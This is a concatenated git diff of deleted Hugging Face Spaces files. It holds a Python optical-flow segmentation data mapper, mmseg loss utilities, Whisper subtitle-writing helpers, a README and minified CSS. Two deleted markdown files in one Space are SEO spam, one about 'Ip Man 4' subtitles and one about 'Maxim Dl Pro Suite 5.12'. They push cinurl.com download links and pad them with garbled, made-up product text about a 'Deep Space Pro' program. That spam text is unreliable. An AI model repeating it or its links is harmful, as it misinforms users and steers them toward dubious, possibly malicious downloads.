dname = Path(flos[0]).parent.name - suffix = '.png' if 'CLEVR' in fname else '.jpg' - rgb_dir = (self.data_dir[1] / dname / fname).with_suffix(suffix) - gt_dir = (self.data_dir[2] / dname / fname).with_suffix('.png') - - flo0 = einops.rearrange(read_flow(str(flos[0]), self.resolution, self.to_rgb), 'c h w -> h w c') - flo1 = einops.rearrange(read_flow(str(flos[1]), self.resolution, self.to_rgb), 'c h w -> h w c') - if self.big_flow_resolution is not None: - flo0_big = einops.rearrange(read_flow(str(flos[0]), self.big_flow_resolution, self.to_rgb), 'c h w -> h w c') - flo1_big = einops.rearrange(read_flow(str(flos[1]), self.big_flow_resolution, self.to_rgb), 'c h w -> h w c') - rgb = d2_utils.read_image(rgb_dir).astype(np.float32) - original_rgb = torch.as_tensor(np.ascontiguousarray(np.transpose(rgb, (2, 0, 1)).clip(0., 255.))).float() - if self.read_big: - rgb_big = d2_utils.read_image(str(rgb_dir).replace('480p', '1080p')).astype(np.float32) - rgb_big = (torch.as_tensor(np.ascontiguousarray(rgb_big))[:, :, :3]).permute(2, 0, 1).clamp(0., 255.) - if self.force1080p_transforms is not None: - rgb_big = F.interpolate(rgb_big[None], size=(1080, 1920), mode='bicubic').clamp(0., 255.)[0] - - # print('not here', rgb.min(), rgb.max()) - input = DT.AugInput(rgb) - - # Apply the augmentation: - preprocessing_transforms = self.transforms(input) # type: DT.Transform - rgb = input.image - if self.photometric_aug: - rgb_aug = Image.fromarray(rgb.astype(np.uint8)) - rgb_aug = self.photometric_aug(rgb_aug) - rgb_aug = d2_utils.convert_PIL_to_numpy(rgb_aug, 'RGB') - rgb_aug = np.transpose(rgb_aug, (2, 0, 1)).astype(np.float32) - rgb = np.transpose(rgb, (2, 0, 1)) - rgb = rgb.clip(0., 255.) - # print('here', rgb.min(), rgb.max()) - d2_utils.check_image_size(dataset_dict, flo0) - if gt_dir.exists(): - sem_seg_gt = d2_utils.read_image(str(gt_dir)) - sem_seg_gt = preprocessing_transforms.apply_segmentation(sem_seg_gt) - # sem_seg_gt = cv2.resize(sem_seg_gt, (self.resolution[1], self.resolution[0]), interpolation=cv2.INTER_NEAREST) - if sem_seg_gt.ndim == 3: - sem_seg_gt = sem_seg_gt[:, :, 0] - if sem_seg_gt.max() == 255: - sem_seg_gt = (sem_seg_gt > 128).astype(int) - else: - sem_seg_gt = np.zeros((self.resolution[0], self.resolution[1])) - - - gwm_dir = (Path(str(self.data_dir[2]).replace('Annotations', 'gwm')) / dname / fname).with_suffix('.png') - if gwm_dir.exists(): - gwm_seg_gt = d2_utils.read_image(str(gwm_dir)) - gwm_seg_gt = preprocessing_transforms.apply_segmentation(gwm_seg_gt) - gwm_seg_gt = np.array(gwm_seg_gt) - # gwm_seg_gt = cv2.resize(gwm_seg_gt, (self.resolution[1], self.resolution[0]), interpolation=cv2.INTER_NEAREST) - if gwm_seg_gt.ndim == 3: - gwm_seg_gt = gwm_seg_gt[:, :, 0] - if gwm_seg_gt.max() == 255: - gwm_seg_gt[gwm_seg_gt == 255] = 1 - else: - gwm_seg_gt = None - - if sem_seg_gt is None: - raise ValueError( - "Cannot find 'sem_seg_file_name' for semantic segmentation dataset {}.".format( - dataset_dict["file_name"] - ) - ) - - # Pad image and segmentation label here! - if self.to_rgb: - flo0 = torch.as_tensor(np.ascontiguousarray(flo0.transpose(2, 0, 1))) / 2 + .5 - flo0 = flo0 * 255 - flo1 = torch.as_tensor(np.ascontiguousarray(flo1.transpose(2, 0, 1))) / 2 + .5 - flo1 = flo1 * 255 - if self.big_flow_resolution is not None: - flo0_big = torch.as_tensor(np.ascontiguousarray(flo0_big.transpose(2, 0, 1))) / 2 + .5 - flo0_big = flo0_big * 255 - flo1_big = torch.as_tensor(np.ascontiguousarray(flo1_big.transpose(2, 0, 1))) / 2 + .5 - flo1_big = flo1_big * 255 - else: - flo0 = torch.as_tensor(np.ascontiguousarray(flo0.transpose(2, 0, 1))) - flo1 = torch.as_tensor(np.ascontiguousarray(flo1.transpose(2, 0, 1))) - - if self.norm_flow: - flo0 = flo0 / (flo0 ** 2).sum(0).max().sqrt() - flo1 = flo1 / (flo1 ** 2).sum(0).max().sqrt() - - flo0 = flo0.clip(-self.flow_clip, self.flow_clip) - flo1 = flo1.clip(-self.flow_clip, self.flow_clip) - - if self.big_flow_resolution is not None: - flo0_big = torch.as_tensor(np.ascontiguousarray(flo0_big.transpose(2, 0, 1))) - flo1_big = torch.as_tensor(np.ascontiguousarray(flo1_big.transpose(2, 0, 1))) - if self.norm_flow: - flo0_big = flo0_big / (flo0_big ** 2).sum(0).max().sqrt() - flo1_big = flo1_big / (flo1_big ** 2).sum(0).max().sqrt() - flo0_big = flo0_big.clip(-self.flow_clip, self.flow_clip) - flo1_big = flo1_big.clip(-self.flow_clip, self.flow_clip) - - rgb = torch.as_tensor(np.ascontiguousarray(rgb)) - if self.photometric_aug: - rgb_aug = torch.as_tensor(np.ascontiguousarray(rgb_aug)) - - if sem_seg_gt is not None: - sem_seg_gt = torch.as_tensor(sem_seg_gt.astype("long")) - if gwm_seg_gt is not None: - gwm_seg_gt = torch.as_tensor(gwm_seg_gt.astype("long")) - - if self.size_divisibility > 0: - image_size = (flo0.shape[-2], flo0.shape[-1]) - padding_size = [ - 0, - int(self.size_divisibility * math.ceil(image_size[1] // self.size_divisibility)) - image_size[1], - 0, - int(self.size_divisibility * math.ceil(image_size[0] // self.size_divisibility)) - image_size[0], - ] - flo0 = F.pad(flo0, padding_size, value=0).contiguous() - flo1 = F.pad(flo1, padding_size, value=0).contiguous() - rgb = F.pad(rgb, padding_size, value=128).contiguous() - if self.photometric_aug: - rgb_aug = F.pad(rgb_aug, padding_size, value=128).contiguous() - if sem_seg_gt is not None: - sem_seg_gt = F.pad(sem_seg_gt, padding_size, value=self.ignore_label).contiguous() - if gwm_seg_gt is not None: - gwm_seg_gt = F.pad(gwm_seg_gt, padding_size, value=self.ignore_label).contiguous() - - image_shape = (rgb.shape[-2], rgb.shape[-1]) # h, w - - # Pytorch's dataloader is efficient on torch.Tensor due to shared-memory, - # but not efficient on large generic data structures due to the use of pickle & mp.Queue. - # Therefore it's important to use torch.Tensor. - dataset_dict["flow"] = flo0 - dataset_dict["flow_2"] = flo1 - - # dataset_dict["flow_fwd"] = flo_norm_fwd - # dataset_dict["flow_bwd"] = flo_norm_bwd - # dataset_dict["flow_rgb"] = rgb_flo0 - # dataset_dict["flow_gap"] = gap - - dataset_dict["rgb"] = rgb - dataset_dict["original_rgb"] = original_rgb - if self.read_big: - dataset_dict["RGB_BIG"] = rgb_big - if self.photometric_aug: - dataset_dict["rgb_aug"] = rgb_aug - - if self.big_flow_resolution is not None: - dataset_dict["flow_big"] = flo0_big - dataset_dict["flow_big_2"] = flo1_big - - - if sem_seg_gt is not None: - dataset_dict["sem_seg"] = sem_seg_gt.long() - - if gwm_seg_gt is not None: - dataset_dict["gwm_seg"] = gwm_seg_gt.long() - - if "annotations" in dataset_dict: - raise ValueError("Semantic segmentation dataset should not have 'annotations'.") - - # Prepare per-category binary masks - if sem_seg_gt is not None: - sem_seg_gt = sem_seg_gt.numpy() - instances = Instances(image_shape) - classes = np.unique(sem_seg_gt) - # remove ignored region - classes = classes[classes != self.ignore_label] - instances.gt_classes = torch.tensor(classes, dtype=torch.int64) - - masks = [] - for class_id in classes: - masks.append(sem_seg_gt == class_id) - - if len(masks) == 0: - # Some image does not have annotation (all ignored) - instances.gt_masks = torch.zeros((0, sem_seg_gt.shape[-2], sem_seg_gt.shape[-1])) - else: - masks = BitMasks( - torch.stack([torch.from_numpy(np.ascontiguousarray(x.copy())) for x in masks]) - ) - instances.gt_masks = masks.tensor - - dataset_dict["instances"] = instances - dataset_dicts.append(dataset_dict) - - return dataset_dicts diff --git a/spaces/superprpogresor/Bringing-Old-Photos-Back-to-Life/README.md b/spaces/superprpogresor/Bringing-Old-Photos-Back-to-Life/README.md deleted file mode 100644 index 64d68975396ef963de6572f3f977e934b5d66ddd..0000000000000000000000000000000000000000 --- a/spaces/superprpogresor/Bringing-Old-Photos-Back-to-Life/README.md +++ /dev/null @@ -1,12 +0,0 @@ ---- -title: Bringing Old Photos Back To Life -emoji: 🐢 -colorFrom: purple -colorTo: indigo -sdk: gradio -sdk_version: 3.16.2 -app_file: app.py -pinned: false ---- - -Check out the configuration reference at https://huggingface.co/docs/hub/spaces-config-reference diff --git a/spaces/suppsumstagza/text-to-image-stable-diffusion-v1-5/scripts/Ip Man 4 English Subtitles Downloadl.md b/spaces/suppsumstagza/text-to-image-stable-diffusion-v1-5/scripts/Ip Man 4 English Subtitles Downloadl.md deleted file mode 100644 index 4cab47d17254a9561284e4da402469ef4643e9ec..0000000000000000000000000000000000000000 --- a/spaces/suppsumstagza/text-to-image-stable-diffusion-v1-5/scripts/Ip Man 4 English Subtitles Downloadl.md +++ /dev/null @@ -1,6 +0,0 @@ -

      Ip Man 4 English Subtitles Downloadl


      Download Zip ->->->-> https://cinurl.com/2uEZ6A



      -
      -English Subtitles ready for download, The Hitman's Bodyguard 2 2020 720p, ... Movie Ip Man 3 In (hindi Dubbed) Part 2 Action Movie movie Download in HD mp4, 3Gp, . ... Business Plan Template Software Free Downloadl 1fdad05405
      -
      -
      -

      diff --git a/spaces/suppsumstagza/text-to-image-stable-diffusion-v1-5/scripts/Maxim Dl Pro Suite 5.12 NEW.md b/spaces/suppsumstagza/text-to-image-stable-diffusion-v1-5/scripts/Maxim Dl Pro Suite 5.12 NEW.md deleted file mode 100644 index fa8997c161762840c92dd2f030f7b14f7b2ea217..0000000000000000000000000000000000000000 --- a/spaces/suppsumstagza/text-to-image-stable-diffusion-v1-5/scripts/Maxim Dl Pro Suite 5.12 NEW.md +++ /dev/null @@ -1,28 +0,0 @@ -

      Maxim Dl Pro Suite 5.12


      Download File 🔗 https://cinurl.com/2uEYJX



      - -Easy to use, MaxIm DL Pro is available for Mac, Windows and Linux operating systems, and on any web browser. - -Deep Space Pro uses a single "unified" command-line utility that is invoked from within Deep Space Pro, and from the command line. - -To the right is an example command to load images into Deep Space Pro from the command line. - -For more information on using Deep Space Pro, please see the Guide to Using Deep Space Pro, found at the bottom of this page. - -Now let's look at the Deep Space Pro Viewer. This Viewer lets you browse the images, videos, and panoramas stored in Deep Space Pro, or on your hard drive. It shows the thumbnail views of an image file, and each thumbnail can be expanded to full screen for a better view. - -Deep Space Pro provides a number of preferences which you can customize. The Preferences window can be found by clicking on the button at the top left of the main window. - -Among the many features of Deep Space Pro is its ability to use a non-default JPG compression quality setting for JPEG images. In addition, the JPEG compression quality setting can be set at any time, and even set to the default. - -If your camera, storage device, or data are lossy, you may wish to use the option of Maximum Quality Compression. Doing so saves image quality, but at the expense of the storage space required for the image. - -Likewise, you may want to specify a lower compression for your JPEG images. If you are using a camera which has JPEG quality compression, it is recommended to use a lower quality setting. Do this by specifying a value of -1 for the JPEG quality setting. - -You can also use the JPEG quality setting to create a custom JPG file. This gives you the ability to select a JPEG quality setting that best suits your needs. However, the JPEG quality setting can only be changed after an image has been written to disk. If you specify a JPEG quality setting, you will still see the default JPEG quality setting specified in the Preferences window. - -The red digital watermark is found on each image taken by Deep Space Pro. It indicates the date and time that the image was captured, the camera used, the lens focal length, and the camera orientation. - -The digital watermark will appear in the top-left corner of each image. When the image is in full screen view, the watermark will also be displayed 4fefd39f24
      -
      -
      -

      diff --git a/spaces/svjack/ControlNet-Pose-Chinese/annotator/uniformer/mmseg/models/losses/utils.py b/spaces/svjack/ControlNet-Pose-Chinese/annotator/uniformer/mmseg/models/losses/utils.py deleted file mode 100644 index 85aec9f3045240c3de96a928324ae8f5c3aebe8b..0000000000000000000000000000000000000000 --- a/spaces/svjack/ControlNet-Pose-Chinese/annotator/uniformer/mmseg/models/losses/utils.py +++ /dev/null @@ -1,121 +0,0 @@ -import functools - -import annotator.uniformer.mmcv as mmcv -import numpy as np -import torch.nn.functional as F - - -def get_class_weight(class_weight): - """Get class weight for loss function. - - Args: - class_weight (list[float] | str | None): If class_weight is a str, - take it as a file name and read from it. - """ - if isinstance(class_weight, str): - # take it as a file path - if class_weight.endswith('.npy'): - class_weight = np.load(class_weight) - else: - # pkl, json or yaml - class_weight = mmcv.load(class_weight) - - return class_weight - - -def reduce_loss(loss, reduction): - """Reduce loss as specified. - - Args: - loss (Tensor): Elementwise loss tensor. - reduction (str): Options are "none", "mean" and "sum". - - Return: - Tensor: Reduced loss tensor. - """ - reduction_enum = F._Reduction.get_enum(reduction) - # none: 0, elementwise_mean:1, sum: 2 - if reduction_enum == 0: - return loss - elif reduction_enum == 1: - return loss.mean() - elif reduction_enum == 2: - return loss.sum() - - -def weight_reduce_loss(loss, weight=None, reduction='mean', avg_factor=None): - """Apply element-wise weight and reduce loss. - - Args: - loss (Tensor): Element-wise loss. - weight (Tensor): Element-wise weights. - reduction (str): Same as built-in losses of PyTorch. - avg_factor (float): Avarage factor when computing the mean of losses. - - Returns: - Tensor: Processed loss values. - """ - # if weight is specified, apply element-wise weight - if weight is not None: - assert weight.dim() == loss.dim() - if weight.dim() > 1: - assert weight.size(1) == 1 or weight.size(1) == loss.size(1) - loss = loss * weight - - # if avg_factor is not specified, just reduce the loss - if avg_factor is None: - loss = reduce_loss(loss, reduction) - else: - # if reduction is mean, then average the loss by avg_factor - if reduction == 'mean': - loss = loss.sum() / avg_factor - # if reduction is 'none', then do nothing, otherwise raise an error - elif reduction != 'none': - raise ValueError('avg_factor can not be used with reduction="sum"') - return loss - - -def weighted_loss(loss_func): - """Create a weighted version of a given loss function. - - To use this decorator, the loss function must have the signature like - `loss_func(pred, target, **kwargs)`. The function only needs to compute - element-wise loss without any reduction. This decorator will add weight - and reduction arguments to the function. The decorated function will have - the signature like `loss_func(pred, target, weight=None, reduction='mean', - avg_factor=None, **kwargs)`. - - :Example: - - >>> import torch - >>> @weighted_loss - >>> def l1_loss(pred, target): - >>> return (pred - target).abs() - - >>> pred = torch.Tensor([0, 2, 3]) - >>> target = torch.Tensor([1, 1, 1]) - >>> weight = torch.Tensor([1, 0, 1]) - - >>> l1_loss(pred, target) - tensor(1.3333) - >>> l1_loss(pred, target, weight) - tensor(1.) - >>> l1_loss(pred, target, reduction='none') - tensor([1., 1., 2.]) - >>> l1_loss(pred, target, weight, avg_factor=2) - tensor(1.5000) - """ - - @functools.wraps(loss_func) - def wrapper(pred, - target, - weight=None, - reduction='mean', - avg_factor=None, - **kwargs): - # get element-wise loss - loss = loss_func(pred, target, **kwargs) - loss = weight_reduce_loss(loss, weight, reduction, avg_factor) - return loss - - return wrapper diff --git a/spaces/syy404/whisper-webui/src/utils.py b/spaces/syy404/whisper-webui/src/utils.py deleted file mode 100644 index b85a7f3ff5c2e3e94823f4e1bf181e54edb1ddf9..0000000000000000000000000000000000000000 --- a/spaces/syy404/whisper-webui/src/utils.py +++ /dev/null @@ -1,115 +0,0 @@ -import textwrap -import unicodedata -import re - -import zlib -from typing import Iterator, TextIO - - -def exact_div(x, y): - assert x % y == 0 - return x // y - - -def str2bool(string): - str2val = {"True": True, "False": False} - if string in str2val: - return str2val[string] - else: - raise ValueError(f"Expected one of {set(str2val.keys())}, got {string}") - - -def optional_int(string): - return None if string == "None" else int(string) - - -def optional_float(string): - return None if string == "None" else float(string) - - -def compression_ratio(text) -> float: - return len(text) / len(zlib.compress(text.encode("utf-8"))) - - -def format_timestamp(seconds: float, always_include_hours: bool = False, fractionalSeperator: str = '.'): - assert seconds >= 0, "non-negative timestamp expected" - milliseconds = round(seconds * 1000.0) - - hours = milliseconds // 3_600_000 - milliseconds -= hours * 3_600_000 - - minutes = milliseconds // 60_000 - milliseconds -= minutes * 60_000 - - seconds = milliseconds // 1_000 - milliseconds -= seconds * 1_000 - - hours_marker = f"{hours:02d}:" if always_include_hours or hours > 0 else "" - return f"{hours_marker}{minutes:02d}:{seconds:02d}{fractionalSeperator}{milliseconds:03d}" - - -def write_txt(transcript: Iterator[dict], file: TextIO): - for segment in transcript: - print(segment['text'].strip(), file=file, flush=True) - - -def write_vtt(transcript: Iterator[dict], file: TextIO, maxLineWidth=None): - print("WEBVTT\n", file=file) - for segment in transcript: - text = process_text(segment['text'], maxLineWidth).replace('-->', '->') - - print( - f"{format_timestamp(segment['start'])} --> {format_timestamp(segment['end'])}\n" - f"{text}\n", - file=file, - flush=True, - ) - - -def write_srt(transcript: Iterator[dict], file: TextIO, maxLineWidth=None): - """ - Write a transcript to a file in SRT format. - Example usage: - from pathlib import Path - from whisper.utils import write_srt - result = transcribe(model, audio_path, temperature=temperature, **args) - # save SRT - audio_basename = Path(audio_path).stem - with open(Path(output_dir) / (audio_basename + ".srt"), "w", encoding="utf-8") as srt: - write_srt(result["segments"], file=srt) - """ - for i, segment in enumerate(transcript, start=1): - text = process_text(segment['text'].strip(), maxLineWidth).replace('-->', '->') - - # write srt lines - print( - f"{i}\n" - f"{format_timestamp(segment['start'], always_include_hours=True, fractionalSeperator=',')} --> " - f"{format_timestamp(segment['end'], always_include_hours=True, fractionalSeperator=',')}\n" - f"{text}\n", - file=file, - flush=True, - ) - -def process_text(text: str, maxLineWidth=None): - if (maxLineWidth is None or maxLineWidth < 0): - return text - - lines = textwrap.wrap(text, width=maxLineWidth, tabsize=4) - return '\n'.join(lines) - -def slugify(value, allow_unicode=False): - """ - Taken from https://github.com/django/django/blob/master/django/utils/text.py - Convert to ASCII if 'allow_unicode' is False. Convert spaces or repeated - dashes to single dashes. Remove characters that aren't alphanumerics, - underscores, or hyphens. Convert to lowercase. Also strip leading and - trailing whitespace, dashes, and underscores. - """ - value = str(value) - if allow_unicode: - value = unicodedata.normalize('NFKC', value) - else: - value = unicodedata.normalize('NFKD', value).encode('ascii', 'ignore').decode('ascii') - value = re.sub(r'[^\w\s-]', '', value.lower()) - return re.sub(r'[-\s]+', '-', value).strip('-_') \ No newline at end of file diff --git a/spaces/t13718236382/web-ui/_next/static/css/60ec184094fe2bcc.css b/spaces/t13718236382/web-ui/_next/static/css/60ec184094fe2bcc.css deleted file mode 100644 index 67dcb7698c21d38c409d5fc739bba2c8e20aa370..0000000000000000000000000000000000000000 --- a/spaces/t13718236382/web-ui/_next/static/css/60ec184094fe2bcc.css +++ /dev/null @@ -1 +0,0 @@ -@media (prefers-color-scheme:dark){.markdown-body{color-scheme:dark;--color-prettylights-syntax-comment:#8b949e;--color-prettylights-syntax-constant:#79c0ff;--color-prettylights-syntax-entity:#d2a8ff;--color-prettylights-syntax-storage-modifier-import:#c9d1d9;--color-prettylights-syntax-entity-tag:#7ee787;--color-prettylights-syntax-keyword:#ff7b72;--color-prettylights-syntax-string:#a5d6ff;--color-prettylights-syntax-variable:#ffa657;--color-prettylights-syntax-brackethighlighter-unmatched:#f85149;--color-prettylights-syntax-invalid-illegal-text:#f0f6fc;--color-prettylights-syntax-invalid-illegal-bg:#8e1519;--color-prettylights-syntax-carriage-return-text:#f0f6fc;--color-prettylights-syntax-carriage-return-bg:#b62324;--color-prettylights-syntax-string-regexp:#7ee787;--color-prettylights-syntax-markup-list:#f2cc60;--color-prettylights-syntax-markup-heading:#1f6feb;--color-prettylights-syntax-markup-italic:#c9d1d9;--color-prettylights-syntax-markup-bold:#c9d1d9;--color-prettylights-syntax-markup-deleted-text:#ffdcd7;--color-prettylights-syntax-markup-deleted-bg:#67060c;--color-prettylights-syntax-markup-inserted-text:#aff5b4;--color-prettylights-syntax-markup-inserted-bg:#033a16;--color-prettylights-syntax-markup-changed-text:#ffdfb6;--color-prettylights-syntax-markup-changed-bg:#5a1e02;--color-prettylights-syntax-markup-ignored-text:#c9d1d9;--color-prettylights-syntax-markup-ignored-bg:#1158c7;--color-prettylights-syntax-meta-diff-range:#d2a8ff;--color-prettylights-syntax-brackethighlighter-angle:#8b949e;--color-prettylights-syntax-sublimelinter-gutter-mark:#484f58;--color-prettylights-syntax-constant-other-reference-link:#a5d6ff;--color-fg-default:#c9d1d9;--color-fg-muted:#8b949e;--color-fg-subtle:#6e7681;--color-canvas-default:#0d1117;--color-canvas-subtle:#161b22;--color-border-default:#30363d;--color-border-muted:#21262d;--color-neutral-muted:hsla(215,8%,47%,.4);--color-accent-fg:#58a6ff;--color-accent-emphasis:#1f6feb;--color-attention-subtle:rgba(187,128,9,.15);--color-danger-fg:#f85149}}@media (prefers-color-scheme:light){.markdown-body{color-scheme:light;--color-prettylights-syntax-comment:#6e7781;--color-prettylights-syntax-constant:#0550ae;--color-prettylights-syntax-entity:#8250df;--color-prettylights-syntax-storage-modifier-import:#24292f;--color-prettylights-syntax-entity-tag:#116329;--color-prettylights-syntax-keyword:#cf222e;--color-prettylights-syntax-string:#0a3069;--color-prettylights-syntax-variable:#953800;--color-prettylights-syntax-brackethighlighter-unmatched:#82071e;--color-prettylights-syntax-invalid-illegal-text:#f6f8fa;--color-prettylights-syntax-invalid-illegal-bg:#82071e;--color-prettylights-syntax-carriage-return-text:#f6f8fa;--color-prettylights-syntax-carriage-return-bg:#cf222e;--color-prettylights-syntax-string-regexp:#116329;--color-prettylights-syntax-markup-list:#3b2300;--color-prettylights-syntax-markup-heading:#0550ae;--color-prettylights-syntax-markup-italic:#24292f;--color-prettylights-syntax-markup-bold:#24292f;--color-prettylights-syntax-markup-deleted-text:#82071e;--color-prettylights-syntax-markup-deleted-bg:#ffebe9;--color-prettylights-syntax-markup-inserted-text:#116329;--color-prettylights-syntax-markup-inserted-bg:#dafbe1;--color-prettylights-syntax-markup-changed-text:#953800;--color-prettylights-syntax-markup-changed-bg:#ffd8b5;--color-prettylights-syntax-markup-ignored-text:#eaeef2;--color-prettylights-syntax-markup-ignored-bg:#0550ae;--color-prettylights-syntax-meta-diff-range:#8250df;--color-prettylights-syntax-brackethighlighter-angle:#57606a;--color-prettylights-syntax-sublimelinter-gutter-mark:#8c959f;--color-prettylights-syntax-constant-other-reference-link:#0a3069;--color-fg-default:#24292f;--color-fg-muted:#57606a;--color-fg-subtle:#6e7781;--color-canvas-default:#fff;--color-canvas-subtle:#f6f8fa;--color-border-default:#d0d7de;--color-border-muted:#d8dee4;--color-neutral-muted:rgba(175,184,193,.2);--color-accent-fg:#0969da;--color-accent-emphasis:#0969da;--color-attention-subtle:#fff8c5;--color-danger-fg:#cf222e}}.markdown-body{-ms-text-size-adjust:100%;-webkit-text-size-adjust:100%;margin:0;color:var(--color-fg-default);background-color:var(--color-canvas-default);font-family:-apple-system,BlinkMacSystemFont,Segoe UI,Noto Sans,Helvetica,Arial,sans-serif,Apple Color Emoji,Segoe UI Emoji;font-size:16px;line-height:1.5;word-wrap:break-word}.markdown-body h1:hover .anchor .octicon-link:before,.markdown-body h2:hover .anchor .octicon-link:before,.markdown-body h3:hover .anchor .octicon-link:before,.markdown-body h4:hover .anchor .octicon-link:before,.markdown-body h5:hover .anchor .octicon-link:before,.markdown-body h6:hover .anchor .octicon-link:before{width:16px;height:16px;content:" ";display:inline-block;background-color:currentColor;-webkit-mask-image:url("data:image/svg+xml,");mask-image:url("data:image/svg+xml,")}.markdown-body details,.markdown-body figcaption,.markdown-body figure{display:block}.markdown-body summary{display:list-item}.markdown-body [hidden]{display:none!important}.markdown-body a{background-color:transparent;color:var(--color-accent-fg);text-decoration:none}.markdown-body abbr[title]{border-bottom:none;-webkit-text-decoration:underline dotted;text-decoration:underline dotted}.markdown-body b,.markdown-body strong{font-weight:var(--base-text-weight-semibold,600)}.markdown-body dfn{font-style:italic}.markdown-body h1{margin:.67em 0;font-weight:var(--base-text-weight-semibold,600);padding-bottom:.3em;font-size:2em;border-bottom:1px solid var(--color-border-muted)}.markdown-body mark{background-color:var(--color-attention-subtle);color:var(--color-fg-default)}.markdown-body small{font-size:90%}.markdown-body sub,.markdown-body sup{font-size:75%;line-height:0;position:relative;vertical-align:baseline}.markdown-body sub{bottom:-.25em}.markdown-body sup{top:-.5em}.markdown-body img{border-style:none;max-width:100%;box-sizing:content-box;background-color:var(--color-canvas-default)}.markdown-body code,.markdown-body kbd,.markdown-body pre,.markdown-body samp{font-family:monospace;font-size:1em}.markdown-body figure{margin:1em 40px}.markdown-body hr{box-sizing:content-box;overflow:hidden;background:transparent;height:.25em;padding:0;margin:24px 0;background-color:var(--color-border-default);border:0}.markdown-body input{font:inherit;margin:0;overflow:visible;font-family:inherit;font-size:inherit;line-height:inherit}.markdown-body [type=button],.markdown-body [type=reset],.markdown-body [type=submit]{-webkit-appearance:button}.markdown-body [type=checkbox],.markdown-body [type=radio]{box-sizing:border-box;padding:0}.markdown-body [type=number]::-webkit-inner-spin-button,.markdown-body [type=number]::-webkit-outer-spin-button{height:auto}.markdown-body [type=search]::-webkit-search-cancel-button,.markdown-body [type=search]::-webkit-search-decoration{-webkit-appearance:none}.markdown-body ::-webkit-input-placeholder{color:inherit;opacity:.54}.markdown-body ::-webkit-file-upload-button{-webkit-appearance:button;font:inherit}.markdown-body a:hover{text-decoration:underline}.markdown-body ::-moz-placeholder{color:var(--color-fg-subtle);opacity:1}.markdown-body ::placeholder{color:var(--color-fg-subtle);opacity:1}.markdown-body hr:after,.markdown-body hr:before{display:table;content:""}.markdown-body hr:after{clear:both}.markdown-body table{border-spacing:0;border-collapse:collapse;display:block;width:-moz-max-content;width:max-content;max-width:100%;overflow:auto}.markdown-body td,.markdown-body th{padding:0}.markdown-body details summary{cursor:pointer}.markdown-body details:not([open])>:not(summary){display:none!important}.markdown-body [role=button]:focus,.markdown-body a:focus,.markdown-body input[type=checkbox]:focus,.markdown-body input[type=radio]:focus{outline:2px solid var(--color-accent-fg);outline-offset:-2px;box-shadow:none}.markdown-body [role=button]:focus:not(:focus-visible),.markdown-body a:focus:not(:focus-visible),.markdown-body input[type=checkbox]:focus:not(:focus-visible),.markdown-body input[type=radio]:focus:not(:focus-visible){outline:1px solid transparent}.markdown-body [role=button]:focus-visible,.markdown-body a:focus-visible,.markdown-body input[type=checkbox]:focus-visible,.markdown-body input[type=radio]:focus-visible{outline:2px solid var(--color-accent-fg);outline-offset:-2px;box-shadow:none}.markdown-body a:not([class]):focus,.markdown-body a:not([class]):focus-visible,.markdown-body input[type=checkbox]:focus,.markdown-body input[type=checkbox]:focus-visible,.markdown-body input[type=radio]:focus,.markdown-body input[type=radio]:focus-visible{outline-offset:0}.markdown-body kbd{display:inline-block;padding:3px 5px;font:11px ui-monospace,SFMono-Regular,SF Mono,Menlo,Consolas,Liberation Mono,monospace;line-height:10px;color:var(--color-fg-default);vertical-align:middle;background-color:var(--color-canvas-subtle);border-bottom-color:var(--color-neutral-muted);border:1px solid var(--color-neutral-muted);border-radius:6px;box-shadow:inset 0 -1px 0 var(--color-neutral-muted)}.markdown-body h1,.markdown-body h2,.markdown-body h3,.markdown-body h4,.markdown-body h5,.markdown-body h6{margin-top:24px;margin-bottom:16px;font-weight:var(--base-text-weight-semibold,600);line-height:1.25}.markdown-body h2{padding-bottom:.3em;font-size:1.5em;border-bottom:1px solid var(--color-border-muted)}.markdown-body h2,.markdown-body h3{font-weight:var(--base-text-weight-semibold,600)}.markdown-body h3{font-size:1.25em}.markdown-body h4{font-size:1em}.markdown-body h4,.markdown-body h5{font-weight:var(--base-text-weight-semibold,600)}.markdown-body h5{font-size:.875em}.markdown-body h6{font-weight:var(--base-text-weight-semibold,600);font-size:.85em;color:var(--color-fg-muted)}.markdown-body p{margin-top:0;margin-bottom:10px}.markdown-body blockquote{margin:0;padding:0 1em;color:var(--color-fg-muted);border-left:.25em solid var(--color-border-default)}.markdown-body ol,.markdown-body ul{margin-top:0;margin-bottom:0;padding-left:2em}.markdown-body ol ol,.markdown-body ul ol{list-style-type:lower-roman}.markdown-body ol ol ol,.markdown-body ol ul ol,.markdown-body ul ol ol,.markdown-body ul ul ol{list-style-type:lower-alpha}.markdown-body dd{margin-left:0}.markdown-body code,.markdown-body pre,.markdown-body samp,.markdown-body tt{font-family:ui-monospace,SFMono-Regular,SF Mono,Menlo,Consolas,Liberation Mono,monospace;font-size:12px}.markdown-body pre{margin-top:0;margin-bottom:0;word-wrap:normal}.markdown-body .octicon{display:inline-block;overflow:visible!important;vertical-align:text-bottom;fill:currentColor}.markdown-body input::-webkit-inner-spin-button,.markdown-body input::-webkit-outer-spin-button{margin:0;-webkit-appearance:none;appearance:none}.markdown-body:after,.markdown-body:before{display:table;content:""}.markdown-body:after{clear:both}.markdown-body>:first-child{margin-top:0!important}.markdown-body>:last-child{margin-bottom:0!important}.markdown-body a:not([href]){color:inherit;text-decoration:none}.markdown-body .absent{color:var(--color-danger-fg)}.markdown-body .anchor{float:left;padding-right:4px;margin-left:-20px;line-height:1}.markdown-body .anchor:focus{outline:none}.markdown-body blockquote,.markdown-body details,.markdown-body dl,.markdown-body ol,.markdown-body p,.markdown-body pre,.markdown-body table,.markdown-body ul{margin-top:0;margin-bottom:16px}.markdown-body blockquote>:first-child{margin-top:0}.markdown-body blockquote>:last-child{margin-bottom:0}.markdown-body h1 .octicon-link,.markdown-body h2 .octicon-link,.markdown-body h3 .octicon-link,.markdown-body h4 .octicon-link,.markdown-body h5 .octicon-link,.markdown-body h6 .octicon-link{color:var(--color-fg-default);vertical-align:middle;visibility:hidden}.markdown-body h1:hover .anchor,.markdown-body h2:hover .anchor,.markdown-body h3:hover .anchor,.markdown-body h4:hover .anchor,.markdown-body h5:hover .anchor,.markdown-body h6:hover .anchor{text-decoration:none}.markdown-body h1:hover .anchor .octicon-link,.markdown-body h2:hover .anchor .octicon-link,.markdown-body h3:hover .anchor .octicon-link,.markdown-body h4:hover .anchor .octicon-link,.markdown-body h5:hover .anchor .octicon-link,.markdown-body h6:hover .anchor .octicon-link{visibility:visible}.markdown-body h1 code,.markdown-body h1 tt,.markdown-body h2 code,.markdown-body h2 tt,.markdown-body h3 code,.markdown-body h3 tt,.markdown-body h4 code,.markdown-body h4 tt,.markdown-body h5 